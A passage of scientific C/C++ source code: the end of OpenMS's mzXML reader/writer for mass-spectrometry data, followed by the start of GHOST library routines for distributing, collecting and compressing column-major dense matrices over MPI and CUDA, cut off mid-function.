ScanWindow window;
optionalAttributeAsDouble_(window.begin, attributes, s_startmz_);
optionalAttributeAsDouble_(window.end, attributes, s_endmz_);
if (window.begin != 0.0 || window.end != 0.0)
{
spectrum_data_.back().spectrum.getInstrumentSettings().getScanWindows().push_back(window);
}
String polarity = "any";
optionalAttributeAsString_(polarity, attributes, s_polarity_);
spectrum_data_.back().spectrum.getInstrumentSettings().setPolarity((IonSource::Polarity) cvStringToEnum_(0, polarity, "polarity"));
// Filter string (see CV term MS:1000512 in mzML)
String filterLine = "";
optionalAttributeAsString_(filterLine, attributes, s_filterline_);
if (!filterLine.empty())
{
spectrum_data_.back().spectrum.setMetaValue("filter string", filterLine);
}
String type = "";
optionalAttributeAsString_(type, attributes, s_scantype_);
if (type == "")
{
//unknown/unset => do nothing here => no warning in the end
}
else if (type == "zoom")
{
spectrum_data_.back().spectrum.getInstrumentSettings().setZoomScan(true);
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
}
else if (type == "Full")
{
if (ms_level > 1)
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MSNSPECTRUM);
else
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
}
else if (type == "SIM")
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::SIM);
}
else if (type == "SRM" || type == "MRM")
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::SRM);
}
else if (type == "CRM")
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::CRM);
}
else if (type == "Q1")
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
}
else if (type == "Q3")
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
}
else if (type == "EMS") //Non-standard type: Enhanced MS (ABI - Sashimi converter)
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
}
else if (type == "EPI") //Non-standard type: Enhanced Product Ion (ABI - Sashimi converter)
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
spectrum_data_.back().spectrum.setMSLevel(2);
}
else if (type == "ER") // Non-standard type: Enhanced Resolution (ABI - Sashimi converter)
{
spectrum_data_.back().spectrum.getInstrumentSettings().setZoomScan(true);
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
}
else
{
spectrum_data_.back().spectrum.getInstrumentSettings().setScanMode(InstrumentSettings::MASSSPECTRUM);
warning(LOAD, String("Unknown scan mode '") + type + "'. Assuming full scan");
}
++scan_count_;
}
else if (tag == "operator")
{
exp_->getContacts().resize(1);
exp_->getContacts().back().setFirstName(attributeAsString_(attributes, s_first_));
exp_->getContacts().back().setLastName(attributeAsString_(attributes, s_last_));
String tmp = "";
optionalAttributeAsString_(tmp, attributes, s_email_);
exp_->getContacts().back().setEmail(tmp);
tmp = "";
optionalAttributeAsString_(tmp, attributes, s_phone_);
if (tmp != "")
{
exp_->getContacts().back().setMetaValue("#phone", tmp);
}
tmp = "";
optionalAttributeAsString_(tmp, attributes, s_uri_);
exp_->getContacts().back().setURL(tmp);
}
else if (tag == "msManufacturer")
{
exp_->getInstrument().setVendor(attributeAsString_(attributes, s_value_));
}
else if (tag == "msModel")
{
exp_->getInstrument().setModel(attributeAsString_(attributes, s_value_));
}
else if (tag == "msIonisation")
{
exp_->getInstrument().getIonSources().resize(1);
exp_->getInstrument().getIonSources()[0].setIonizationMethod((IonSource::IonizationMethod) cvStringToEnum_(2, attributeAsString_(attributes, s_value_), "msIonization"));
}
else if (tag == "msMassAnalyzer")
{
exp_->getInstrument().getMassAnalyzers().resize(1);
exp_->getInstrument().getMassAnalyzers()[0].setType((MassAnalyzer::AnalyzerType) cvStringToEnum_(3, attributeAsString_(attributes, s_value_), "msMassAnalyzer"));
}
else if (tag == "msDetector")
{
exp_->getInstrument().getIonDetectors().resize(1);
exp_->getInstrument().getIonDetectors()[0].setType((IonDetector::Type) cvStringToEnum_(4, attributeAsString_(attributes, s_value_), "msDetector"));
}
else if (tag == "msResolution")
{
exp_->getInstrument().getMassAnalyzers()[0].setResolutionMethod((MassAnalyzer::ResolutionMethod) cvStringToEnum_(5, attributeAsString_(attributes, s_value_), "msResolution"));
}
else if (tag == "dataProcessing")
{
data_processing_.push_back( DataProcessingPtr(new DataProcessing));
String boolean = "";
optionalAttributeAsString_(boolean, attributes, s_deisotoped_);
if (boolean == "true" || boolean == "1")
{
data_processing_.back()->getProcessingActions().insert(DataProcessing::DEISOTOPING);
}
boolean = "";
optionalAttributeAsString_(boolean, attributes, s_chargedeconvoluted_);
if (boolean == "true" || boolean == "1")
{
data_processing_.back()->getProcessingActions().insert(DataProcessing::CHARGE_DECONVOLUTION);
}
double cutoff = 0.0;
optionalAttributeAsDouble_(cutoff, attributes, s_intensitycutoff_);
if (cutoff != 0.0)
{
data_processing_.back()->setMetaValue("#intensity_cutoff", cutoff);
}
boolean = "";
optionalAttributeAsString_(boolean, attributes, s_centroided_);
if (boolean == "true" || boolean == "1")
{
data_processing_.back()->getProcessingActions().insert(DataProcessing::PEAK_PICKING);
}
}
else if (tag == "nameValue")
{
String name = "";
optionalAttributeAsString_(name, attributes, s_name_);
if (name == "")
return;
String value = "";
optionalAttributeAsString_(value, attributes, s_value_);
String& parent_tag = *(open_tags_.end() - 2);
if (parent_tag == "msInstrument")
{
exp_->getInstrument().setMetaValue(name, value);
}
else if (parent_tag == "scan")
{
spectrum_data_.back().spectrum.setMetaValue(name, value);
}
else
{
std::cout << " Warning: Unexpected tag 'nameValue' in tag '" << parent_tag << "'" << "\n";
}
}
else if (tag == "processingOperation")
{
String name = "";
optionalAttributeAsString_(name, attributes, s_name_);
if (name == "")
return;
String value = "";
optionalAttributeAsString_(value, attributes, s_value_);
data_processing_.back()->setMetaValue(name, value);
}
//std::cout << " -- !Start -- " << "\n";
}
template <typename MapType>
void MzXMLHandler<MapType>::endElement(const XMLCh* const /*uri*/, const XMLCh* const /*local_name*/, const XMLCh* const qname)
{
OPENMS_PRECONDITION(nesting_level_ >= 0, "Nesting level needs to be zero or more")
//std::cout << " -- End -- " << sm_.convert(qname) << " -- " << "\n";
static const XMLCh* s_mzxml = xercesc::XMLString::transcode("mzXML");
static const XMLCh* s_scan = xercesc::XMLString::transcode("scan");
open_tags_.pop_back();
if (equal_(qname, s_mzxml))
{
// Flush the remaining data
populateSpectraWithData_();
// End of mzXML
logger_.endProgress();
}
else if (equal_(qname, s_scan))
{
// End of scan: go up one nesting level
// Check whether to populate spectra when on highest nesting level
nesting_level_--;
OPENMS_PRECONDITION(nesting_level_ >= 0, "Nesting level needs to be zero or more")
if (nesting_level_ == 0 && spectrum_data_.size() >= options_.getMaxDataPoolSize())
{
populateSpectraWithData_();
}
}
//std::cout << " -- End -- " << "\n";
sm_.clear();
}
template <typename MapType>
void MzXMLHandler<MapType>::characters(const XMLCh* const chars, const XMLSize_t length)
{
//Abort if this spectrum should be skipped
if (skip_spectrum_)
return;
if (open_tags_.back() == "peaks")
{
//chars may be split to several chunks => concatenate them
if (options_.getFillData())
{
// Since we convert a Base64 string here, it can only contain plain ASCII
sm_.appendASCII(chars, length, spectrum_data_.back().char_rest_);
}
}
else if (open_tags_.back() == "offset" || open_tags_.back() == "indexOffset" || open_tags_.back() == "sha1")
{
}
else if (open_tags_.back() == "precursorMz")
{
char* transcoded_chars = sm_.convert(chars);
double mz_pos = asDouble_(transcoded_chars);
//precursor m/z
spectrum_data_.back().spectrum.getPrecursors().back().setMZ(mz_pos);
//update window bounds - center them around the m/z pos
double window_width = spectrum_data_.back().spectrum.getPrecursors().back().getIsolationWindowLowerOffset();
if (window_width != 0.0)
{
spectrum_data_.back().spectrum.getPrecursors().back().setIsolationWindowLowerOffset(0.5 * window_width);
spectrum_data_.back().spectrum.getPrecursors().back().setIsolationWindowUpperOffset(0.5 * window_width);
}
}
else if (open_tags_.back() == "comment")
{
char* transcoded_chars = sm_.convert(chars);
String parent_tag = *(open_tags_.end() - 2);
//std::cout << "- Comment of parent " << parent_tag << "\n";
if (parent_tag == "msInstrument")
{
exp_->getInstrument().setMetaValue("#comment", String(transcoded_chars));
}
else if (parent_tag == "dataProcessing")
{
//this is currently ignored
}
else if (parent_tag == "scan")
{
spectrum_data_.back().spectrum.setComment(transcoded_chars);
}
else if (String(transcoded_chars).trim() != "")
{
warning(LOAD, String("Unhandled comment '") + transcoded_chars + "' in element '" + open_tags_.back() + "'");
}
}
else
{
char* transcoded_chars = sm_.convert(chars);
if (String(transcoded_chars).trim() != "")
{
warning(LOAD, String("Unhandled character content '") + transcoded_chars + "' in element '" + open_tags_.back() + "'");
}
}
}
template <typename MapType>
void MzXMLHandler<MapType>::writeTo(std::ostream& os)
{
//determine how many spectra there are (count only those with peaks)
UInt count_tmp_ = 0;
for (Size s = 0; s < cexp_->size(); s++)
{
const SpectrumType& spec = (*cexp_)[s];
if (spec.size() != 0)
++count_tmp_;
}
if (count_tmp_ == 0)
++count_tmp_;
logger_.startProgress(0, cexp_->size(), "storing mzXML file");
os << "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n"
<< "<mzXML xmlns=\"http://sashimi.sourceforge.net/schema_revision/mzXML_2.1\" "
<< "xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" "
<< "xsi:schemaLocation=\"http://sashimi.sourceforge.net/schema_revision/mzXML_2.1 "
<< "http://sashimi.sourceforge.net/schema_revision/mzXML_2.1/mzXML_idx_2.1.xsd\">\n"
<< "\t<msRun scanCount=\"" << count_tmp_ << "\">\n";
//----------------------------------------------------------------------------------------
// parent files
//----------------------------------------------------------------------------------------
if (cexp_->getSourceFiles().empty())
{
os << "\t\t<parentFile fileName=\"\" fileType=\"processedData\" fileSha1=\"0000000000000000000000000000000000000000\"/>\n";
}
else
{
for (Size i = 0; i < cexp_->getSourceFiles().size(); ++i)
{
const SourceFile& sf = cexp_->getSourceFiles()[i];
os << "\t\t<parentFile fileName=\"" << sf.getNameOfFile() << "\" fileType=\"";
//file type is an enum in mzXML => search for 'raw' string
String tmp_string = sf.getFileType();
tmp_string.toLower();
if (tmp_string.hasSubstring("raw"))
{
os << "RAWData";
}
else
{
os << "processedData";
}
//Sha1 checksum must have 40 characters => create a fake if it is unknown
os << "\" fileSha1=\"";
tmp_string = sf.getChecksum();
if (sf.getChecksum().size() != 40 || sf.getChecksumType() != SourceFile::SHA1)
{
os << "0000000000000000000000000000000000000000";
}
else
{
os << sf.getChecksum();
}
os << "\"/>\n";
}
}
//----------------------------------------------------------------------------------------
//instrument
//----------------------------------------------------------------------------------------
if (cexp_->getInstrument() != Instrument() || cexp_->getContacts().size() != 0)
{
const Instrument& inst = cexp_->getInstrument();
os << "\t\t<msInstrument>\n"
<< "\t\t\t<msManufacturer category=\"msManufacturer\" value=\"" << inst.getVendor() << "\"/>\n" << "\t\t\t<msModel category=\"msModel\" value=\"" << inst.getModel() << "\"/>\n";
if (inst.getIonSources().empty() || !inst.getIonSources()[0].getIonizationMethod())
{
os << "\t\t\t<msIonisation category=\"msIonisation\" value=\"\"/>\n";
}
else
{
os << "\t\t\t<msIonisation category=\"msIonisation\" value=\"" << cv_terms_[2][inst.getIonSources()[0].getIonizationMethod()] << "\"/>\n";
}
const std::vector<MassAnalyzer>& analyzers = inst.getMassAnalyzers();
if (analyzers.empty() || !analyzers[0].getResolutionMethod())
{
os << "\t\t\t<msMassAnalyzer category=\"msMassAnalyzer\" value=\"\"/>\n";
}
else
{
os << "\t\t\t<msMassAnalyzer category=\"msMassAnalyzer\" value=\"" << cv_terms_[3][analyzers[0].getType()] << "\"/>\n";
}
if (inst.getIonDetectors().empty() || !inst.getIonDetectors()[0].getType())
{
os << "\t\t\t<msDetector category=\"msDetector\" value=\"\"/>\n";
}
else
{
os << "\t\t\t<msDetector category=\"msDetector\" value=\"" << cv_terms_[4][inst.getIonDetectors()[0].getType()] << "\"/>\n";
}
os << "\t\t\t<software type=\"acquisition\" name=\"" << inst.getSoftware().getName() << "\" version=\"" << inst.getSoftware().getVersion() << "\"/>\n";
if (analyzers.empty() || !analyzers[0].getResolutionMethod())
{
os << "\t\t\t<msResolution category=\"msResolution\" value=\"\"/>\n";
}
else
{
os << "\t\t\t<msResolution category=\"msResolution\" value=\"" << cv_terms_[5][analyzers[0].getResolutionMethod()] << "\"/>\n";
}
if (cexp_->getContacts().size() > 0)
{
const ContactPerson& cont = cexp_->getContacts()[0];
os << "\t\t\t<operator first=\"" << cont.getFirstName() << "\" last=\"" << cont.getLastName() << "\"";
if (cont.getEmail() != "")
{
os << " email=\"" << cont.getEmail() << "\"";
}
if (cont.getURL() != "")
{
os << " URI=\"" << cont.getURL() << "\"";
}
if (cont.metaValueExists("#phone"))
{
os << " phone=\"" << writeXMLEscape(cont.getMetaValue("#phone").toString()) << "\"";
}
os << "/>\n";
}
writeUserParam_(os, inst, 3);
if (inst.metaValueExists("#comment"))
{
os << "\t\t\t<comment>" << writeXMLEscape(inst.getMetaValue("#comment")) << "</comment>\n";
}
os << "\t\t</msInstrument>\n";
}
//----------------------------------------------------------------------------------------
//data processing (the information of the first spectrum is assigned to the whole file)
//----------------------------------------------------------------------------------------
if (cexp_->size() == 0 || (*cexp_)[0].getDataProcessing().empty())
{
os << "\t\t<dataProcessing>\n"
<< "\t\t\t<software type=\"processing\" name=\"\" version=\"\"/>\n"
<< "\t\t</dataProcessing>\n";
}
else
{
for (Size i = 0; i < (*cexp_)[0].getDataProcessing().size(); ++i)
{
const DataProcessing& data_processing = * (*cexp_)[0].getDataProcessing()[i].get();
os << "\t\t<dataProcessing deisotoped=\""
<< data_processing.getProcessingActions().count(DataProcessing::DEISOTOPING)
<< "\" chargeDeconvoluted=\""
<< data_processing.getProcessingActions().count(DataProcessing::CHARGE_DECONVOLUTION)
<< "\" centroided=\""
<< data_processing.getProcessingActions().count(DataProcessing::PEAK_PICKING)
<< "\"";
if (data_processing.metaValueExists("#intensity_cutoff"))
{
os << " intensityCutoff=\"" << writeXMLEscape(data_processing.getMetaValue("#intensity_cutoff").toString()) << "\"";
}
os << ">\n"
<< "\t\t\t<software type=\"";
if (data_processing.metaValueExists("#type"))
{
os << writeXMLEscape(data_processing.getMetaValue("#type").toString());
}
else
{
os << "processing";
}
os << "\" name=\"" << data_processing.getSoftware().getName()
<< "\" version=\"" << data_processing.getSoftware().getVersion();
if (data_processing.getCompletionTime() != DateTime())
{
os << "\" completionTime=\"" << data_processing.getCompletionTime().get().substitute(' ', 'T');
}
os << "\"/>\n";
writeUserParam_(os, data_processing, 3, "processingOperation");
os << "\t\t</dataProcessing>\n";
}
}
//check if the nativeID of all spectra are numbers or numbers prefixed with 'scan='
//If not we need to renumber all spectra.
bool all_numbers = true;
bool all_empty = true;
bool all_prefixed_numbers = true;
for (Size s = 0; s < cexp_->size(); s++)
{
String native_id = (*cexp_)[s].getNativeID();
if (!native_id.hasPrefix("scan="))
{
all_prefixed_numbers = false;
}
else
{
native_id = native_id.substr(5);
}
try
{
native_id.toInt();
}
catch (Exception::ConversionError&)
{
all_numbers = false;
all_prefixed_numbers = false;
if (native_id != "")
{
all_empty = false;
}
}
}
//If we need to renumber and the nativeIDs were not empty, warn the user
if (!all_numbers && !all_empty)
{
warning(STORE, "Not all spectrum native IDs are numbers or correctly prefixed with 'scan='. The spectra are renumbered and the native IDs are lost!");
}
// write scans
std::stack<UInt> open_scans;
for (Size s = 0; s < cexp_->size(); s++)
{
logger_.setProgress(s);
const SpectrumType& spec = (*cexp_)[s];
UInt ms_level = spec.getMSLevel();
open_scans.push(ms_level);
Size spectrum_id = s + 1;
if (all_prefixed_numbers)
{
spectrum_id = spec.getNativeID().substr(5).toInt();
}
else if (all_numbers)
{
spectrum_id = spec.getNativeID().toInt();
}
os << String(ms_level + 1, '\t')
<< "<scan num=\"" << spectrum_id << "\" msLevel=\""
<< ms_level << "\" peaksCount=\""
<< spec.size() << "\" polarity=\"";
if (spec.getInstrumentSettings().getPolarity() == IonSource::POSITIVE)
{
os << "+";
}
else if (spec.getInstrumentSettings().getPolarity() == IonSource::NEGATIVE)
{
os << "-";
}
else
{
os << "any";
}
//scan type
switch (spec.getInstrumentSettings().getScanMode())
{
case InstrumentSettings::UNKNOWN:
break;
case InstrumentSettings::MASSSPECTRUM:
case InstrumentSettings::MS1SPECTRUM:
case InstrumentSettings::MSNSPECTRUM:
if (spec.getInstrumentSettings().getZoomScan())
{
os << "\" scanType=\"zoom";
}
else
{
os << "\" scanType=\"Full";
}
break;
case InstrumentSettings::SIM:
os << "\" scanType=\"SIM";
break;
case InstrumentSettings::SRM:
os << "\" scanType=\"SRM";
break;
case InstrumentSettings::CRM:
os << "\" scanType=\"CRM";
break;
default:
os << "\" scanType=\"Full";
warning(STORE, String("Scan type '") + InstrumentSettings::NamesOfScanMode[spec.getInstrumentSettings().getScanMode()] + "' not supported by mzXML. Using 'Full' scan mode!");
}
// filter line
if (spec.metaValueExists("filter string") )
{
os << "\" filterLine=\"";
os << writeXMLEscape ( (String)spec.getMetaValue("filter string") );
}
// base peak mz (used by some programs like MAVEN), according to xsd:
// "m/z of the base peak (most intense peak)"
os << "\" basePeakMz=\"";
double basePeakInt = 0;
double basePeakMz = 0;
for (Size j = 0; j < spec.size(); j++)
{
if (spec[j].getIntensity() > basePeakInt)
{
basePeakInt = spec[j].getIntensity();
basePeakMz = spec[j].getMZ();
}
}
os << basePeakMz;
// retention time
os << "\" retentionTime=\"";
if (spec.getRT() < 0)
os << "-";
os << "PT" << std::fabs(spec.getRT()) << "S\"";
if (!spec.getInstrumentSettings().getScanWindows().empty())
{
os << " startMz=\"" << spec.getInstrumentSettings().getScanWindows()[0].begin << "\" endMz=\"" << spec.getInstrumentSettings().getScanWindows()[0].end << "\"";
}
if (spec.getInstrumentSettings().getScanWindows().size() > 1)
{
warning(STORE, "The MzXML format can store only one scan window for each scan. Only the first one is stored!");
}
// end of "scan" attributes
os << ">\n";
for (Size i = 0; i < spec.getPrecursors().size(); ++i)
{
const Precursor& precursor = spec.getPrecursors()[i];
//intensity
os << String(ms_level + 2, '\t') << "<precursorMz precursorIntensity=\"" << precursor.getIntensity();
//charge
if (precursor.getCharge() != 0)
os << "\" precursorCharge=\"" << precursor.getCharge();
//window size
if (precursor.getIsolationWindowLowerOffset() + precursor.getIsolationWindowUpperOffset() > 0.0)
os << "\" windowWideness=\"" << (precursor.getIsolationWindowUpperOffset() + precursor.getIsolationWindowLowerOffset());
//m/z
os << "\">" << precursor.getMZ() << "</precursorMz>\n";
}
if (!spec.empty())
{
os << String(ms_level + 2, '\t') << "<peaks precision=\"32\"" << " byteOrder=\"network\" pairOrder=\"m/z-int\">";
//std::cout << "Writing scan " << s << "\n";
std::vector<float> tmp;
for (Size i = 0; i < spec.size(); i++)
{
tmp.push_back(spec[i].getMZ());
tmp.push_back(spec[i].getIntensity());
}
String encoded;
decoder_.encode(tmp, Base64::BYTEORDER_BIGENDIAN, encoded);
os << encoded << "</peaks>\n";
}
else
{
os << String(ms_level + 2, '\t') << "<peaks precision=\"32\"" << " byteOrder=\"network\" pairOrder=\"m/z-int\" xsi:nil=\"true\"/>\n";
}
writeUserParam_(os, spec, ms_level + 2);
if (spec.getComment() != "")
{
os << String(ms_level + 2, '\t') << "<comment>" << spec.getComment() << "</comment>\n";
}
//check MS level of next scan and close scans (scans can be nested)
UInt next_ms_level = 0;
if (s < cexp_->size() - 1)
{
next_ms_level = ((*cexp_)[s + 1]).getMSLevel();
}
//std::cout << "scan: " << s << " this: " << ms_level << " next: " << next_ms_level << "\n";
if (next_ms_level <= ms_level)
{
for (Size i = 0; i <= ms_level - next_ms_level && !open_scans.empty(); ++i)
{
os << String(ms_level - i + 1, '\t') << "</scan>\n";
open_scans.pop();
}
}
}
os << "\t</msRun>\n"
<< "\t<indexOffset>0</indexOffset>\n"
<< "</mzXML>\n";
logger_.endProgress();
spec_write_counter_ = 1;
}
} // namespace Internal
} // namespace OpenMS
#endif
|
densemat_cm.c | #define _XOPEN_SOURCE 500
#include "ghost/config.h"
#include "ghost/types.h"
#include "ghost/core.h"
#include "ghost/datatransfers.h"
#include "ghost/densemat_cm.h"
#include "ghost/util.h"
#include "ghost/locality.h"
#include "ghost/context.h"
#include "ghost/instr.h"
#include "ghost/machine.h"
#include "ghost/log.h"
#include "ghost/bindensemat.h"
#include "ghost/densemat_rm.h"
#include "ghost/constants.h"
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#ifdef GHOST_HAVE_CUDA
#include <cuda_runtime.h>
#endif
#define COLMAJOR
#include "ghost/densemat_iter_macros.h"
#include "ghost/densemat_common.c.def"
ghost_error ghost_densemat_cm_distributeVector(ghost_densemat *vec, ghost_densemat *nodeVec, ghost_context *ctx)
{
GHOST_DEBUG_LOG(1,"Distributing vector");
int me;
int nprocs;
GHOST_CALL_RETURN(ghost_rank(&me, ctx->mpicomm));
GHOST_CALL_RETURN(ghost_nrank(&nprocs, ctx->mpicomm));
bool uniformstorage;
GHOST_CALL_RETURN(ghost_densemat_uniformstorage(&uniformstorage,vec,ctx->mpicomm));
if (!uniformstorage) {
GHOST_ERROR_LOG("Cannot collect vectors of different storage order");
return GHOST_ERR_INVALID_ARG;
}
ghost_lidx c;
#ifdef GHOST_HAVE_MPI
GHOST_DEBUG_LOG(2,"Scattering global vector to local vectors");
ghost_mpi_datatype mpidt;
GHOST_CALL_RETURN(ghost_mpi_datatype_get(&mpidt,vec->traits.datatype));
int i;
MPI_Request req[vec->traits.ncols*2*(nprocs-1)];
MPI_Status stat[vec->traits.ncols*2*(nprocs-1)];
int msgcount = 0;
for (i=0;i<vec->traits.ncols*2*(nprocs-1);i++)
req[i] = MPI_REQUEST_NULL;
if (me != 0) {
for (c=0; c<vec->traits.ncols; c++) {
MPI_CALL_RETURN(MPI_Irecv(DENSEMAT_VALPTR(nodeVec,0,c),ctx->row_map->ldim[me],mpidt,0,me,ctx->mpicomm,&req[msgcount]));
msgcount++;
}
} else {
for (c=0; c<vec->traits.ncols; c++) {
memcpy(DENSEMAT_VALPTR(nodeVec,0,c),DENSEMAT_VALPTR(vec,0,c),vec->elSize*ctx->row_map->ldim[0]);
for (i=1;i<nprocs;i++) {
MPI_CALL_RETURN(MPI_Isend(DENSEMAT_VALPTR(vec,ctx->row_map->goffs[i],c),ctx->row_map->ldim[i],mpidt,i,i,ctx->mpicomm,&req[msgcount]));
msgcount++;
}
}
}
MPI_CALL_RETURN(MPI_Waitall(msgcount,req,stat));
#else
for (c=0; c<vec->traits.ncols; c++) {
memcpy(DENSEMAT_VALPTR(nodeVec,0,c),DENSEMAT_VALPTR(vec,0,c),DM_NROWS(vec)*vec->elSize);
}
// *nodeVec = vec->clone(vec);
#endif
ghost_densemat_upload(nodeVec);
GHOST_DEBUG_LOG(1,"Vector distributed successfully");
return GHOST_SUCCESS;
}
ghost_error ghost_densemat_cm_collectVectors(ghost_densemat *vec, ghost_densemat *totalVec, ghost_context *ctx)
{
#ifdef GHOST_HAVE_MPI
int me;
ghost_lidx c;
int nprocs;
ghost_mpi_datatype mpidt;
GHOST_CALL_RETURN(ghost_rank(&me, ctx->mpicomm));
GHOST_CALL_RETURN(ghost_nrank(&nprocs, ctx->mpicomm));
GHOST_CALL_RETURN(ghost_mpi_datatype_get(&mpidt,vec->traits.datatype));
bool uniformstorage;
GHOST_CALL_RETURN(ghost_densemat_uniformstorage(&uniformstorage,vec,ctx->mpicomm));
if (!uniformstorage) {
GHOST_ERROR_LOG("Cannot collect vectors of different storage order");
return GHOST_ERR_INVALID_ARG;
}
// if (ctx != NULL)
// vec->permute(vec,ctx->invRowPerm);
int i;
MPI_Request req[vec->traits.ncols*2*(nprocs-1)];
MPI_Status stat[vec->traits.ncols*2*(nprocs-1)];
int msgcount = 0;
for (i=0;i<vec->traits.ncols*2*(nprocs-1);i++) {
req[i] = MPI_REQUEST_NULL;
}
if (me != 0) {
for (c=0; c<vec->traits.ncols; c++) {
MPI_CALL_RETURN(MPI_Isend(DENSEMAT_VALPTR(vec,0,c),ctx->row_map->ldim[me],mpidt,0,me,ctx->mpicomm,&req[msgcount]));
msgcount++;
}
} else {
for (c=0; c<vec->traits.ncols; c++) {
memcpy(DENSEMAT_VALPTR(totalVec,0,c),DENSEMAT_VALPTR(vec,0,c),vec->elSize*ctx->row_map->ldim[0]);
for (i=1;i<nprocs;i++) {
MPI_CALL_RETURN(MPI_Irecv(DENSEMAT_VALPTR(totalVec,ctx->row_map->goffs[i],c),ctx->row_map->ldim[i],mpidt,i,i,ctx->mpicomm,&req[msgcount]));
msgcount++;
}
}
}
MPI_CALL_RETURN(MPI_Waitall(msgcount,req,stat));
#else
UNUSED(ctx);
ghost_densemat_init_densemat(totalVec,vec,0,0);
#endif
return GHOST_SUCCESS;
}
ghost_error ghost_densemat_cm_compress(ghost_densemat *vec)
{
if (!(vec->traits.flags & GHOST_DENSEMAT_SCATTERED)) {
return GHOST_SUCCESS;
}
if (vec->traits.location & GHOST_LOCATION_HOST) {
ghost_lidx v,i;
char *val = NULL;
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
GHOST_CALL_RETURN(ghost_malloc_pinned((void **)&val,
(size_t)vec->traits.ncolspadded*DM_NROWSPAD(vec)*
vec->elSize));
} else {
GHOST_CALL_RETURN(ghost_malloc_align((void **)&val,
(size_t)vec->traits.ncolspadded*DM_NROWSPAD(vec)*
vec->elSize,GHOST_DATA_ALIGNMENT));
}
#pragma omp parallel for schedule(runtime) private(v)
for (i=0; i<DM_NROWSPAD(vec); i++)
{
for (v=0; v<vec->traits.ncols; v++)
{
val[(v*DM_NROWSPAD(vec)+i)*vec->elSize] = 0;
}
}
DENSEMAT_ITER(vec,memcpy(&val[((col)*DM_NROWSPAD(vec)+(row))*vec->elSize],valptr,vec->elSize));
vec->val = val;
/* for (v=0; v<vec->traits.ncols; v++)
{
memcpy(&val[(v*DM_NROWS(vec)padded)*vec->elSize],
DENSEMAT_VALPTR(vec,0,v),DM_NROWS(vec)padded*vec->elSize);
if (!(vec->traits.flags & GHOST_DENSEMAT_VIEW)) {
free(vec->val[v]);
}
vec->val[v] = &val[(v*DM_NROWS(vec)padded)*vec->elSize];
}*/
}
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
#ifdef GHOST_HAVE_CUDA
char *cu_val;
GHOST_CALL_RETURN(ghost_cu_malloc((void **)&cu_val,DM_NROWSPAD(vec)*vec->traits.ncols*vec->elSize));
DENSEMAT_ITER(vec,ghost_cu_memcpy(&cu_val[(col*DM_NROWSPAD(vec)+col)*vec->elSize],
DENSEMAT_CUVALPTR(vec,memrow,memcol),vec->elSize));
if (!(vec->traits.flags & GHOST_DENSEMAT_VIEW)) {
GHOST_CALL_RETURN(ghost_cu_free(vec->cu_val));
}
vec->cu_val = cu_val;
#endif
}
ghost_bitmap_free(vec->rowmask); vec->rowmask = NULL;
ghost_bitmap_free(vec->colmask); vec->colmask = NULL;
vec->traits.flags &= ~(ghost_densemat_flags)GHOST_DENSEMAT_VIEW;
vec->traits.flags &= ~(ghost_densemat_flags)GHOST_DENSEMAT_SCATTERED;
vec->stride = DM_NROWSPAD(vec);
vec->src = vec;
return GHOST_SUCCESS;
}
ghost_error ghost_densemat_cm_halocommInit(ghost_densemat *vec, ghost_context *ctx, ghost_densemat_halo_comm *comm)
{
#ifdef GHOST_HAVE_MPI
GHOST_FUNC_ENTER(GHOST_FUNCTYPE_COMMUNICATION);
ghost_error ret = GHOST_SUCCESS;
int i, to_PE, from_PE, partner;
int nprocs, me;
GHOST_CALL_GOTO(ghost_rank(&me, ctx->mpicomm),err,ret);
GHOST_CALL_GOTO(ghost_nrank(&nprocs, ctx->mpicomm),err,ret);
GHOST_CALL_GOTO(ghost_densemat_halocommInit_common(vec,ctx,comm),err,ret);
if (!comm->tmprecv) {
GHOST_CALL_GOTO(ghost_malloc((void **)&comm->tmprecv,nprocs*sizeof(char *)),err,ret);
if (vec->traits.ncols == 1) {
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
#ifdef GHOST_HAVE_GPUDIRECT
for (from_PE=0; from_PE<nprocs; from_PE++) {
comm->tmprecv[from_PE] = DENSEMAT_CUVALPTR(vec,ctx->hput_pos[from_PE],0);
}
#else
GHOST_CALL_GOTO(ghost_malloc((void **)&comm->tmprecv_mem,vec->traits.ncols*vec->elSize*comm->acc_wishes),err,ret);
for (from_PE=0; from_PE<nprocs; from_PE++){
comm->tmprecv[from_PE] = &comm->tmprecv_mem[comm->wishptr[from_PE]*vec->traits.ncols*vec->elSize];
}
GHOST_INSTR_START("hostAlloc")
GHOST_CALL_GOTO(ghost_cu_malloc_pinned((void **)&comm->work,(size_t)vec->traits.ncols*comm->acc_dues*vec->elSize),err,ret);
GHOST_INSTR_STOP("hostAlloc")
#endif
GHOST_INSTR_START("deviceAlloc")
GHOST_CALL_GOTO(ghost_cu_malloc(&comm->cu_work,vec->traits.ncols*comm->acc_dues*vec->elSize),err,ret);
GHOST_INSTR_STOP("deviceAlloc")
} else {
for (from_PE=0; from_PE<nprocs; from_PE++) {
comm->tmprecv[from_PE] = DENSEMAT_VALPTR(vec,ctx->hput_pos[from_PE],0);
}
GHOST_CALL_GOTO(ghost_malloc((void **)&comm->work,(size_t)vec->traits.ncols*comm->acc_dues*vec->elSize),err,ret);
}
} else {
